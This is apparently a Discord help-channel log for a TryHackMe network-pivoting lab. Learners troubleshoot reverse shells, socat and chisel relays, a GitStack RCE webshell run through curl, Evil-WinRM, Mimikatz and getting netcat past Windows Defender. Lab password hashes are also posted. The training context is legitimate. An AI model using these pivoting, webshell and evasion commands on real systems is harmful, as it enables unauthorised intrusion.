$6$hlOGzVl7VI17Ij8Y$bvLi6CRKA/MWT8Wbnr9RxsgTD4wXm76nCX01vZu/VP0qb4ceFng.pakE6KybHOw8jLF8HO8yBu09BnzWdj/yn1 , but I put this one
Showing an error
Please help me
What is the IP address @surreal sail, @rustic smelt?
10.200.196.200 for me @merry robin
Cool. Could one of you disconnect and DM me your .ovpn pack please 🙂
yep if you want
falcon-wreath.ovpn : @rustic smelt
That should be fixed now 🙂
okay let me check
How do I make sure the network is running? I ping it after running OpenVPN and get nothing from my Kali box?
I didn’t see this picture up top
Is this a way to redirect from the victim's website to mine?
Or how is it used in real life?
It's used in real life just as it's used in the room
I don't get why they forward like this
my reverse shell doesn't work. I've added the port to the public firewall rules followed the tutorial, if anyone could help me. DM me, that would be appreciated.
restarted the server and now it works 😄
Can't ping the public-facing IP address..
host unreachable and vote is not working.. 😦
just gonna watch the walkthrough then...
It's reachable again
Nice room thanks for making it 🙂
Most companies have a private website that is only accessible via LAN and not via WAN. If you want to hack the private LAN website you need to access it somehow. That's why you need port forwarding
Tech, can you please check the wreath network, even subs users can't reach the network
How easy is it to notice me in the network when I'm connected with sshuttle?
Quite, given there's SSH traffic in/out of the network to your system
Did anyone manage to do Wreath only using Metasploit?
Should be possible I think...
yeh I thought so too, but I'm having trouble catching a shell in metasploit from the gitstack machine
What are you using for pivoting?
so the webmin vuln you can exploit via metasploit to get a meterpreter shell on the public web server, then to exploit the gitstack one you can set the lhost to this public web server (metasploit understands it has to route through the established meterpreter session)
don't you have to set autoroute first?
sure
Did you?
yep
I just don't seem to hit the exploit/multi/handler listener
for the record, I've also done the entire room in the intended way, and that all worked fine
You might have to set up a proxy server and tunnel through it
but the gitstack machine should be able to reach the public web server, this is also what is used in the powershell command
I think you do need a proxy server along with autoroute
try use socks_proxy
If there is someone who knows better, please correct me
then use gitstack_rce with set Proxies socks5:127.0.0.1:1080
did you successfully use gitstack_rce? That module gave me maximum length errors with every payload I tried
I went the manual route and then tried to upgrade to a meterpreter shell from the powershell method detailed in the notes (but cannot manage to catch a shell in multi handler like I said)
I will try. I haven't tried with metasploit.
Wait so the reverse shell doesn't get to you?
I can catch it the intended way with nc (so like in the notes), but when I then try to upgrade to a meterpreter reverse shell I cannot catch it with exploit/multi/handler
which is why I'm so confused
I first tried getting a meterpreter shell in one go from gitstack_rce but that just kept failing me
That is weird...
yeh ... if you feel like giving it a go I'd be interested to see what you come up with
I will try and get back to you
👍
Going through the code, it seems that the maximum payload size is 6110 bits. So most payloads exceed this limit. That's why we get the error
I'm going through Wreath and I'm trying to use socat to forward the traffic on my compromised machine (port: 16160) to my Kali machine (port: 17000) so that I can catch the shell from the 2nd Windows machine, but socat just hangs and nothing happens in my listener. Any idea on what I'm doing wrong here? I have my Kali netcat listening on 1700
./socat tco-1:16160 tcp:10.50.151.9:17000 &
I get unexpected token 'newline' line 7 '<!DOCTYPE html>'
shouldn't netcat be listening on 17000 not 1700?
This should be ./socat tcp-l:16160 tcp:10.50.151.9:17000 &
You had tco instead of tcp and 1 instead of l
That is a L not a 1. (Should be lowercase. I put uppercase for clarity)
You downloaded the webpage, not the binary
omg lol that's probably the problem
That too. But how did you manage that 😅.
Mistaking the webpage for the binary, I mean. I didn't pay attention to the error output after I noticed the syntax error. My bad. But yes, <!DOCTYPE html> would suggest that you are trying to execute a webpage...
It's quite common when downloading stuff from Github. People don't realise that you need to explicitly use the raw link rather than the link to the file
Ah I see. Thanks Muiri
Gave +1 Rep to @merry robin
I'm honestly not even sure 🤣 . I'm trying to relay the shell we run via Burp Suite for the Git server through the compromised machine and into my Kali machine so I can access the Windows machine in a Kali terminal. Maybe I'm misunderstanding how to use socat 🤔
Is it working now?
I'll let you know in about an hour. I plan on trying again on my lunch break
It's 9 pm over here lol
Anyone get username for the github clone?
Sorry? Didn't understand
Hi
My exploit for gitstack is not working, giving me the error “no module name request”
Need help please
Pls dm
Try to create an env on Python 2 and install the module requests
pip install requests, I think it was
and don't run it with sudo. A lot of people run pip with sudo
Thanks man this worked
Python 2 was creating the error
Gave +1 Rep to @cedar ferry
You have -ssh-cmd. You want --ssh-cmd
Pretty sure you also want the exclude
I used sshuttle to connect to that network and access the .100 host
But I can't (
If you read on the room page, you will find that machine with .100 is wreath-pc and is not public facing and also not accessible to the first machine .200 (prod-serv)
Good luck👍 🙂
And the room will help you by providing various methods and tools to get you to the final machine wreath-pc from prod-serv (public facing) through .150 git-serv (accessible to .200)
I think someone deleted the ||id_rsa|| of my Wreath instance... What should I do?
Are you able to connect to the machine (the first one, prod-serv)?
If you think there is some issue.
Try appending your own public key into ~/.ssh/authorized_keys and have fun with this room🙂
Why isn't it working? (
Task 20
Hello, I have a problem with the SSH connection to the CentOS machine with IP 10.200.185.200
what is the problem?
@twin tide When I scan the first IP with nmap using the command (nmap -p 1-15000 10.200.185.200), I found that the SSH port is not open, it's filtered
@oblique crag
@limber rover
You aren't supposed to ping them for this 
This is honestly hilarious
something new
Cannot add user to repository is normal
A 500 response... is not
Maybe try for a reset
It's the reason for "Cannot add user to repository"
Just added a print for the response
What command do you have it running?
what command do you mean?
this part
Nope. The bit at the very top
Hm. Go for a reset
Wait 5 to 10 mins after starting the network
still filtered
Can anyone vote for a reset? Only one vote is required.
Anyone else lost connectivity towards prod-serv?
Network state: Running : Network up time: 10min
Hello everyone. Can you help me with something please?
Thank you for replying. OK, I am on part 6 of this: downloaded the CVE, ran the shell, but never see it working, it just says listening and nothing happens. What am I doing wrong please?
You'll probably have to change the CVE to match your listening port
So run the CVE using the tun0 IP instead of the THM IP?
Nano or Vim the CVE and take a look
Thanks will try that now
Good luck!
Will need a miracle 😂
Nah. Let me know how it goes
So with the code it goes as it states
"shell"
Types IP (first the THM one, then, having read the comments on Dark's video, the tun0 one)
Types a port number, either something with 7 or 1337
Shell side works, Netcat doesn't do anything.
Got screenshots if it helps
Can you share the CVE config?
It's default. Just ran it with the THM IP
Were you able to get it to work?
My Website.git download is successful within 5 seconds, but I can't find the dir on my Kali PC.... tried without a destination and with a destination. Nothing...
Anyone have a clue?
(Download from Evil-WinRM)
Got frustrated so turned my laptop off and watched LOTR 😎
😆
Anyone got this error while executing the Empire client? [!] Error: <urllib3.connection.HTTPSConnection object at 0x7f0c74896f40>: Failed to establish a new connection: [Errno 111] Connection refused
empire server is running in background
I had this same issue. Used another way to get the files. PM for more detail
When doing the clean-up, how do you delete the nc binary? I get access denied as SYSTEM. Guessing because I'm using it for my shell.
With difficulty. In a situation like that (which would be rare as there would usually be a C2 in the mix) you might consider alerting the point of contact with the company and telling them to remove it.
Okay, thanks! And for the sake of the room, just let it be?
Gave +1 Rep to @merry robin
Yeah, it will get cleared up on reset anyway
I get triggered about the download not just working.... need to find out why 😫 If you just tell me the protocol you used, I will figure the rest out
DM
why would the shell not work properly? Does it run on my IP or the THM IP? And what else am I doing wrong? I can include pictures
Here's the screenshots
Basically it's not listening to the port on NC
Dude take actual screenshots. Those are just annoying to look at!
You have too many tun interfaces. Kill some
sudo pkill openvpn will probably do it. Then reconnect to wreath
Not connected to discord on PC and will try that now
Although it's running the wreath network ovpn file
Yeah, but several times.
!vpnscript
FFS so I do what the fellow suggested? Kill the process and run it again?
Read somewhere that the 10.50.. would run the shell; is that correct?
It worked!
Thank you for your help everyone. Been stumped for 3 days 😂
Hi, I can't access the first machine. There are already 3 of us who have sent a reset request; do we just have to wait? My VPN connection is all correct.
Are you on the wreath VPN or the THM VPN?
wreath vpn
How are you checking your connection?
I have the same problem haha
I don't think the script will deal with Network VPN packs. Can't remember what octets I put into it
I thought you made it deal with that
I can't remember 🤷♂️
@upbeat umbra @median mauve Show the output in your terminal when you try to connect please
Well, it will definitely fail if you have both active at once, and it will also fail at the ping 10.10.10.10 check
Which is where it was failing in those screenshots
I also can't ping 10.10.10.10 on the wreath network. VPN connects fine, only one instance running.
screenshots
Does the network reset after it expires, or does it just pause and come back on when we click start? Does it depend on how many people asked for a reset, or do you absolutely need 8/8? (does that ever happen?)
10.10.10.10 isn't on the wreath network
It just pauses
And there's more than 8 people on the network, it's a proportion of the total users in the network
Oh that makes sense!
Just FYI, the !vpnscript tries to ping 10.10.10.10 which got me confused. The network seems to be back to normal now.
Anyone else having trouble running the exploit against the 2nd box?
Are you using curl? Took me a while to figure it out because I was trying to put the payload inside the Python script.
I was trying to use curl, yes. I had successfully used curl a couple of days ago to ping a host but just now it was returning:
<b>Notice</b>: Undefined index: a in <b>C:\GitStack\gitphp\CrymynylMynd-exploit.php</b> on line <b>1</b><br />
<br />
<b>Warning</b>: system(): Cannot execute a blank command in <b>C:\GitStack\gitphp\CrymynylMynd-exploit.php</b> on line <b>1</b><br />
However, now I am unable to connect to anything
I saw there were 3 requests to Reset so I'm assuming someone has borked something
You need to post with -d "a=[command]"
Yeah, I did that. I just repeated the same command that succeeded the other day
It was in my history
Can you paste your curl command?
Sure. For example:
curl -X POST http://gitserver.thm/web/CrymynylMynd-exploit.php -d "a=ping -n 3 10.50.182.76"
Have you tried url encoding it?
Actually, I'm now getting no route to host, same as the user above
Sorry, I'm not sure what you mean about URL encoding it
so convert the spaces to %xx or whatever
Yes
Btw, the .150 box won't see your own machine, only the .200
i.e. every " ","-","=","." needs to be encoded?
Yeah, I noticed that
and .200 doesn't respond to ping
Use an encoder like I linked. It's simpler than converting yourself
so I think maybe ping was working but now I'm getting no route to host so more serious problem I guess
thanks for the line @manic parrot
Gave +1 Rep to @manic parrot
link i mean
It can't just be Wizzy and I, surely? Are you guys able to reach .200 still?
I was having issues earlier, and then it worked. Not sure right now, I'm not at my pc
Ah OK. I'll reboot, ya never know... Failing that I suppose we just wait for another 4 users to request a reset?
But you can use the PHP exploit, which means you're tunneling from .200 somehow?
I could earlier but I've not been able to reach anything for a while now
sshuttle crapped out too
Ah
Can't reconnect
VPN is up though. Got an IP etc
Ha! Rebooted and I can reach .200 again. Who would have thunk ir
it
Curl works fine now. Thanks guys
Weird
yeah, it looks like .200 was reset, but not .150
I had some files on both, and I lost the ones on .200
Connect to what? You'll need to provide more detail..
please give context and details
Lil confused about the evil-winrm bit. I used sshuttle to connect to git-serv and it sounds like I'm supposed to run win-rm on my local machine which has no direct connection to .150
what have I missed?
sorry, git-serv is .150, I meant I used sshuttle to connect to .200
sshuttle makes a connection to .150 through .200. Kind of like a VPN.
So I should be able to reach .150 from my local machine?
I'm not sure where I've gone wrong then
Ah the error is AuthorizationError. I must have messed up on the password or something
Hrmm reset the password, checked the groups but still getting the same
ah jeeeeez it was the username
thanks @twin tide
Gave +1 Rep to @twin tide
1 little letter
Yeah, super annoying. Takes way too much time to catch it
My attention to detail sucks in my old age
I'm getting no output returned from modules in Empire. Anyone else had that issue?
@earnest nest Don't touch the agent script after you ran it in evil-winrm. It will kill the connection if you CTRL + C out of it. Does anyone know if you can background this?
Thanks but I don’t think I did. I get the output in reports in Starkiller but nothing returns in the CLI. Odd one
Hi
||I'm not reaching .150 Git-Serv 😦 with Evil-WinRM. I already tried with chisel, the ssh client and sshuttle; with sshuttle I can get a connection like a VPN, but I simply can't reach it, even pinging it gets no response||
It's a Windows machine -- they don't respond to ICMP echo packets
Oh, have you looked into why? It's fascinating
It's a firewall rule, although why it's there I have no idea
On normal THM networks it treats AB traffic as a different zone
That's why further nmap is weird
Yep, the rule only applies to public networks
Anything on the same subnet is classed as being part of the same private network
Although why it assumes anything on a different subnet is public I don't know 🤷♂️
Hi! I'm trying to download the git file from .150 and I get an "Info: Download successful!" after 2 sec, but I can't find the file on my local computer 😦
Does someone know why?
Not sure but I would check your default download location in your browser, you might have changed it (default is /home/enelg/Download/filename.git)
Someone else would know better though
Thanks but it must be something else...
That's usually when you're trying to download it to somewhere you don't have write access
Try specifying /tmp
It still doesn't work for me
Can you please clarify a bit more about git file?
Is it .git directory?
task 35
Use evil-winrm to download the entire directory.
From the directory above Website.git, use:
download Website.git
I get a Download successful msg but no website.git on my computer
yes the .git directory
Are you sure you can download a directory?
IIRC, I compressed it first and then downloaded the archive.
I may be wrong, gotta check the room again.
Yeah, and I checked the WU video and it should work. It should take like 5 min but work. I will try to figure out another way to download the file
Yeah, because you mentioning 2 sec doesn't sound good to me
Pfff I needed to specify the full path to the file.... Now it works 🙂
||OK, but I'm not able to use Evil-WinRM. I actually have access via Remmina or xfreerdp, but Evil-WinRM does not have access to the shell, it says connection refused||
I've solved this, just changed the pivot technique and it finally works
does anyone knows how to fix this?
Do you guys think Wreath is harder than Holo?
Not at all
Wreath is designed to be an introduction to networks
okay
Yes
Oh, wait, harder
I thought you said "better"
Wreath is better than Holo, but it's definitely not harder
Hey guys
I can't seem to connect to the network anymore
I'm on the gitserver part so i used the network quite a lot already, came back today, fired my VPN as always and this is what i get:
ping 10.200.187.200
PING 10.200.187.200 (10.200.187.200) 56(84) bytes of data.
From 10.50.184.1 icmp_seq=1 Destination Host Unreachable
From 10.50.184.1 icmp_seq=2 Destination Host Unreachable
From 10.50.184.1 icmp_seq=3 Destination Host Unreachable
SAME!
is there an issue with the network or just me ?
I just died like 30 mins ago
ok that's kind of a relief actually 😄
I tried regenerating my OpenVPN config, to no avail
Guess I'll have to try again tomorrow =/, I voted for a network reset but I need 7 more votes 😅
I just bought it and it's down : (
Can we contact someone from staff about that?
@jagged plank @surreal sail what is the first IP you've been given?
10.200.187.200 is the ip of the first server (the webserver)
At least it was yesterday when i posted
@merry robin
When downloading Website.git it returns "Download successful" in a few seconds, but there isn't a Website.git on my machine
ok, will try
why is there no route to host?
hmm it was working fine for me like 20 mins ago
just tried it again, still not working 😦
my 10days of free access are almost up, it's a shame
I cannot reach the machine anymore, It just disconnected me. Can someone please press the reset button?
There's a large number of wreath instances
Firstly, make sure the network is not sleeping
Secondly, if you are going to ask for a reset here then you need to specify the third octet of your network so that people on your network vote
I think you can still access it after that but you will be put in a different network
I've been doing it for more than 10 days for free
Working through Wreath but my exploit isn't working! Trying to get into the second machine through the ||GitStack|| exploit but I'm getting this error - could anyone help? 🙂
||From what I can see it seems to be doing some very weird stuff and not selecting repos but selecting files on the machine||
Don't worry, had to reset the network, now it works 🙂
@merry robin Sorry if I'm not supposed to @ you, but I just wanted to thank you for the room! I completed it and learnt a lot 🙂
Gave +1 Rep to @merry robin
Glad you enjoyed it 🙂
Any body on the 10.200.87 subnet, are you able to access the room machines?
I don't know what I'm doing wrong! I'm trying to download the ||website git repo|| in task 35, and WinRM is claiming that it downloaded, but it's not appearing in any directory on my local Kali box. Any ideas?
Basically it will be in the directory that you started Evil-WinRM in
that worked, thank you)
Gave +1 Rep to @jagged plank
download FULL_PATH
Had the same issue myself, a small update to the text would be good.
cc @merry robin
Didn't get why we used Empire?
Fairly certain it was just to showcase this kind of tool, we don't use it afterwards.
Hi guys, just started the Wreath network... and I'm already stuck 😐 At the beginning, well in theory not, it's Task 5, enumerate the web server... "Thomas gave us an IP to work with (shown on the Network Panel at the top of the page)." I don't see the IP there 😕
I did the script kiddie thing and ran nmap 10.50.185.0/24, but I'm not sure if I'm supposed to do that. Also, I could have guessed it should be the 10.50.185.0.1 IP, but I'm not sure how realistic this network really is. I'm a bit scared to hit the neighbor, eh. But at the same time, we always say go figure it out yourself, or RTFM, or try harder, but I don't want to get into issues with the THM admin staff 😄
As a side note, at the top of the page, Access Machine is in red. Usually it is green with the VPN. I'm connected and got the IP, so far so good, but maybe a hint for you guys. I'm a noob, eh
So I have 3 computers on that network (4 with me). Shouldn't I see only 1, as from what I understood, only 1 is public facing? (That's why I'm asking myself how realistic this network is vs a real-life situation.) Please, don't hit me, I'm a noob and hope to understand more by following this room 😕
It is fairly realistic.
People do have test, dev and production servers
And some do keep their test and dev servers hidden from public access
Yes of course, like everyone does. A root computer or router from ISP with a few port forwarding. Here I see 3 computers.
*A router computer
BTW, 10.x.x.1 and 10.x.x.250 aren't part of the wreath network
Hum, I need to knock on the door of these other IPs then?
You will get 10.x.x.200 (public server) and using that you will get to pivot into the internal network
To be clear, it isn't Port Forwarding here.
There are legitimately 3 different systems, as once mentioned by Muiri, which are configured on the AWS side
Later in the room, you will be asked to scan for other systems with the subnet mask /24
Moreover, if you are connected to THM VPN. 10.x.x.x is allocated for it and your neighbor shouldn't be using any network there (unless they are doing the same room and sharing the wreath subnet with you 😜)
Well, I mean our neighbors here, the other THM users 😄
I'm attacking the 3rd box but can't get a shell... I think my netcat uploaded to it...
It isn't allowed unless specified in the room.
But your neighbors won't be sharing their systems on the Wreath network
You scanned 10.50.185.0/24 which isn't wreath network but 10.200.x.x instead
Can you verify if your netcat is still there?
The Windows Defender might have quarantined it
I've tried ls'ing different dirs but nothing's showing up. whoami and systeminfo still work tho
So how are you running your netcat executable?
Don't you think if you can't ls or dir to see it, you can't run it?
What I did, was get a webshell to use it along my other shells
Because it wasn't being flagged by Windows Defender (that part is mentioned in the room as well, to obfuscate your payloads)
It doesn't seem to be in temp
I've dir'ed it now because ls wasn't working, and temp is empty
Is that where you uploaded it?
I have the webshell, I'm just trying to get a full shell
Yeah I curled it from a webserver on my local machine
Because ls isn't present in Command Prompt 😅
And the request went through because there was a 200 in the logs
so I don't know where it went lol
I've tried again but it's not there for some reason
You curl-ed the netcat file after hosting it on your system?
That's what I said, Windows Defender is removing it😅
but the room says it would work fine
You gotta obfuscate it
in the room Muiri doesn't obfuscate it
Yup, I got it. Just read it again.
But for me, it wasn't the case. My nc.exe was getting removed whenever I tried to run it
IIRC, after gaining elevated privileges I got myself one RDP session and checked the Windows Defender and there were logs in it
Shall we ping Muiri to alert him about the issues with nc?
I don't think so.
Did you try different variants of nc, available on GitHub?
No, I used the version they told us to use in the room
Try to use some other versions as well
I think, I used nc64.exe from here
https://github.com/int0x33/nc.exe/
That's what I used, it didnt work
nc64.exe or nc.exe?
nc.exe didn't work for me either
I was going to write my own or modify the existing code for nc but nc64.exe did the job
I just finished the room, the nc64 worked for me
I couldn't compile my own, but the one provided works
@lusty saffron when you say it "doesn't work" what do you mean ?
Huh, where?
Hi there
I have found this root hash || root:$6$kLp4TrZyagwh6Mjj$6005g4P4UI5p0LuYmuZu/GB9j/vMG84B5MLc6gN4JIgr8R.RLl064v5PgalNSyBvn9POJejFEzmg59K4Ui43v/:18890:0:99999:7:::||
but the answer format is this, and anything I input is wrong
anyone ?
should we be able to ping the first machine on wreath?
Yes, you should be able to ping the first machine (public facing server) - 10.x.x.200
yeah, I know what the IP is, I am just not able to ping it
Yes please be more descriptive than "it doesn't work"
there's quite a few reasons why a ping would not work, what error are you getting ?
remove the root: part and anything after the last /, the password hash is only the second field, not the entire line
I have tried it, doesn't help
what question is that ?
Task 6, question 5
I am stuck there, because I got the root hash, but it doesn't match the answer format
Where did you find it? The hash doesn't look right. Also, you don't need it to continue. You are never going to use it.
Yes I know, I am about to complete the Wreath
I have found it in || /etc/shadow ||
Is it possible that it could have been changed by one of the players?
the machine has been reset, I will check it again
agh... Yeah, someone has changed the password or the /etc/shadow file :I, that's why it wasn't the right one
Yeah despite what's written about "always think about other people"... some people don't care.
Hello, has someone experienced Mimikatz looping on 10.200.188.150 when launching it?
I uploaded a 64-bit copy of mimikatz.exe through WinRM; when I launch it, it loops. Never happened to me before
A WinRM shell isn't fully interactive, so Mimikatz works about as well as Vim or Nano do in a Linux reverse/bind shell
Why do you think it tells you to use RDP for that section?
You can do .\mimikatz.exe “command”
Just finished Wreath-network and I wanted to give a BIG shout-out and a BIG thanks to @merry robin for putting a lot of time and effort into this room. 💯 🔥
I learned a couple of new tricks and I especially loved the multi pivot situation !
Gave +1 Rep to @merry robin
When I try to download with evil-winrm, it instantly completes the download, gives me a successful exit msg but actually downloads nothing. What gives?
I'm unable to download the git directory in Wreath network. Anyone faced the same issue?
Unable to extract it with gittools after pulling it in a roundabout way using a network share as well
You are only supposed to copy & paste the hash, not all the other stuff between the other colons (so not the whole line, not the root: and not all the stuff after the hash, :18890:0:99999:7:::)
Try doing it with the full path to the directory?
I have a suspicion the new evil-winrm updates broke something, given how often people are asking that
Yep
Will try, didn't actually think of that somehow
i did full directory on my local machine but not for the .git
I know that, but someone has changed the password or the hash itself. Someone has changed the format of the hash 🙂
But as the server was reset, everything is okay now 🙂
@merry robin I have a question: should we follow everything that is taught in the pivoting section and run/test those on the network?
Yes
I see, so, gotta go back and do all those things now
I performed these things, on the network
should I do all of them?
anyone?
Do you think I will hit curious people? curl 10.50.185.124/socat -o king.txt
nvm I was dumb
You need to have a 7-day streak in order to Join wreath room
EDIT: you don't need a 7-day streak if you are a subscriber 😅
7-day streak == Be active 7 days on TryHackMe
7 days, day after day, during 7 days 😛
Not if you're a subscriber
You already joined perhaps?
I don't see it in the network part of the access page :S
If you go to the room, do you have the option to leave the room?
Under the gear ⚙️
Neat, glad that worked
3 days left, and I'm barely halfway 😄
Are you talking about the 7-day streak?
Ninja has already mentioned that a subscriber (which you are) can join the room
Or you are talking about your progress 😅
Yes, started this room 6 days ago, and I'm only half way 😄 Doing this room while taking notes takes ages 😄 (+ all the user errors you know 😄 )
My very slow progress 😄
Oh, I didn't have any issues with my fellow users. 🙂
Hacked the second computer, I'm at task 21 of 46
Keep it up, it is a nice room
It's even a very nice room 😉
I just wonder a real case traditional customer scenario (like at my home for example), where the public facing network machine is an ISP router, not a "real" computer, nor with port forwarding etc
If you are doing this professionally then your company will provide for that
Otherwise port forwarding or a VPS is a good idea
Like enabling port forwarding for my web server running at port:8443 through my ISP after acquiring a public IP?
I only hack WordPress, Drupal and Joomla. It is hard to get further than that. Sometimes I need to give a PoC that I can access a system, but that simply stays at creating some file on the system to prove I got in (and all that screen recorded, that $uck$). Anyway, I have no bad intentions
I only have my IBM CyberSecurity Analyst certification. You won't go far with this in bigger companies. Yeah, smaller companies, but there I'm fully in their network. And you know, James who has set up the web server, John the file server... Without any real IT knowledge. That's a piece of cake that way. In companies like that where there's NOTHING, not even logging turned on...
And openly said, small companies are a real pain to work for. There's no IT department, there's nobody to whom you can speak, to warn, to suggest. They are all noobs. And we haven't even talked about the (security) budget, you know
These small companies just try to put everything up and running with the things and knowledge they have, or can get for cheap or free
Sometimes I really think that consumers have more security (read: privacy) budget than small companies
So you can guess that I'm more and more targeting customers awareness
Like my neighbor Sandra, got that, just from the WiFi AP. I have checked all houses, all names on the bell, to ring her, to ask her if I can hack her Wi-Fi AP, and try to access the rest behind it. And she agreed 😄 But you know, rockyou.txt (or was it SecLists). Sometimes people are so strange to use such easy passwords.
I say this as for example, for my famous Belgian ISP router, I can't even change the WiFi password. That's locked with the provided "user" router account
But the general user doesn't do port forwarding. These general users don't even know they have a "website" on their router, to adjust things
I'm a bit lost at task 29. If I get it right, a /tmp/http_hop folder should be created on the public facing webserver with some files. But that's not the case here. What am I doing wrong? Or did I not get something?
shoot, these files are made on my own kali machine 😄
Is the current chisel in Kali broken? Got client version error, and indeed, when looking on my kali machine I have Version: 0.0.0-src (go1.15.7)
IIRC the ends just have to match
I have got a static build on the Kali machine and this error seems to be gone. Just failing as it does not work as expected. Probably some user error 😄
Yeah, because the versions will match that way
That section is complicated and I'm pretty lost actually 😄
Both ends just need to be the same version
Now I have both same versions, but I wonder where I do my user error
Have opened the firewall: netsh advfirewall firewall add rule name="Chisel-itchy" dir=in action=allow protocol=tcp localport=47100
On the git server: .\chisel-itchy.exe server -p 47100 --socks5
On the kali machine: ./chisel client 10.200.188.150:47100 9090:socks
But always get the error in the browser: The connection was reset
I'm on http://127.0.0.1:9090/
I'm just doing something stupid, but no idea what
The YouTube video is also not clear: https://www.youtube.com/watch?v=VQLeS1uIrVk&list=PLsqUCyw0Jf9sMYXly0uuwfKMu34roGNwk&index=31
You don't want to navigate to this URL, you want it set as your proxy
With FoxyProxy? I have tried that too
If you're using Burp you can set it as an upstream proxy
Or you can set it in foxyproxy
Or you can use proxychains if it's socks
Make sure it's set as socks not http
Yes, socks5
Show settings
Hold on, you mean I need to browse to http://10.200.188.100/ ?
Is that the machine you want to access over the proxy?
Hold on, this works 😄 http://10.200.188.100/
Yes, I guess
😄
Neat, all working?
Yeah, it seems to work now 😄 The error was I was browsing to the wrong place 😐
YES, everything working as expected, idiot I am 😄
I can not believe I was struggling so much and was trying to fetch the proxy itself 😄
Shoot, next issue 😄
Trying to download the git repository. So with Evil-WinRM, browsed to C:\GitStack\repositories> and then download Website.git and it says Info: Download successful! But I do not get this directory on my kali machine 😕
Yeah it's been looking like evil-winrm has been buggy with it lately
Try the full path
Yes! Working, slowly, but working
Strange, on the task it does not talk about full path, nor in the video
Shoot shoot shoot